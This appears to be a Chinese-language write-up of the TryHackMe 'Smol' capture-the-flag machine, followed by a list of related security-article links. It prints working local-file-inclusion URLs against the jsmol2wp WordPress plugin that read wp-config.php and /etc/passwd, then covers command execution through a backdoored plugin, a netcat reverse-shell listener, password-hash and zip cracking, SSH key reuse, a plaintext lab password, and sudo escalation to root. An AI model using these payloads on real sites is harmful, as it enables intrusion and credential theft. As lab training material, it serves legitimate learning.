TryHackMe“Smol”CTF挑战赛

挑战描述

Smol
在此启动到根机器上测试您的枚举技能。

Smol 的核心是一个 WordPress 网站------由于其庞大的插件生态系统,该网站经常成为攻击目标。该机器通过一个众所周知的易受攻击的插件演示了忽视软件更新和安全补丁的风险。为了增强学习体验,Smol还包含一个带有后门的插件,强调了在使用第三方组件之前进行细致的代码检查的重要性。

快速提示: 在没有 GPU 的计算机(如 AttackBox)上,John The Ripper 的 哈希破解速度比Hashcat*更快。*

thm上的meidum靶机,难度适中适合新手进阶.

kali上配置好vpn保证可以ping通靶机

随后进行基础的nmap扫描

注意到开放了22和80端口,尝试访问一下他的web服务

先添加一下dns解析从而能够访问靶机

同时扫描一下目录;

提示靶机使用的wordpress插件搭建的系统

尝试寻找wordpress的漏洞

我使用wpscan枚举插件:

wpscan --url http://www.smol.thm --enumerate p

扫描识别出了该jsmol2wp插件。快速搜索后,我找到了以下 GitHub 存储库,其中记录了该插件的漏洞:

存储库: WordPress jsmol2wp 插件漏洞

根据存储库信息,jsmol2wp该漏洞容易受到LFIXSSSSRF 的攻击。其中,**LFI(本地文件包含)**漏洞似乎对我们的研究最有帮助。

接下来利用LFI打即可

payload:
http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

同理/etc/passwd也可以这样发现

payload: http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=file:///etc/passwd

再扫描目录时发现的敏感文件中存在wordpress仪表盘的登陆平局可以利用它登陆管理系统

进入仪表盘后发现存在其他插件"hello dolly"

Leveraging LFI To Get Full Compromise On WordPress Sites | Trustwave | SpiderLabs | Trustwave解释了如何访问它。让我们立即操作,并在浏览器中访问以下地址:

还是利用LFI

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform= true &call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php

读取文件

注意到一段代码:

php代码,再转义一下

参数是cmd可以利用rce漏洞

在我们的/wp-admin原页面处可以产生构造一下

/wp-admin/index.php?cmd=whoami

可以构造反弹shell获取权限

kali开启 nc -lvvp 8000

进入交互式页面

使用python交互

python3 -c 'import pty;pty.spawn("/bin/bash")'

利用之前的凭据登陆数据库

获取数据库名和表名

提取用户的密码的哈希值

利用john进行破解方式为phpass

提取后尝试登陆

su - diedo

在think文件夹里发现隐藏文件夹ssh

发现id_rsa文件

可以通过这个进行ssh链接

移动成功

发现一个待解压的包

gege用户是可以直接利用的

现在要做的是生成这个压缩包的哈希文件然后用john进行破解

靶机上启动python服务

用kali进行远程下载

密码得到了

去上解压包

xavi的密码是P@ssw0rdxavi@

尝试登陆

三个ALL 表示可以执行root权限

相关推荐
用户9623779544813 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机16 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机16 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544818 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star18 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544821 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全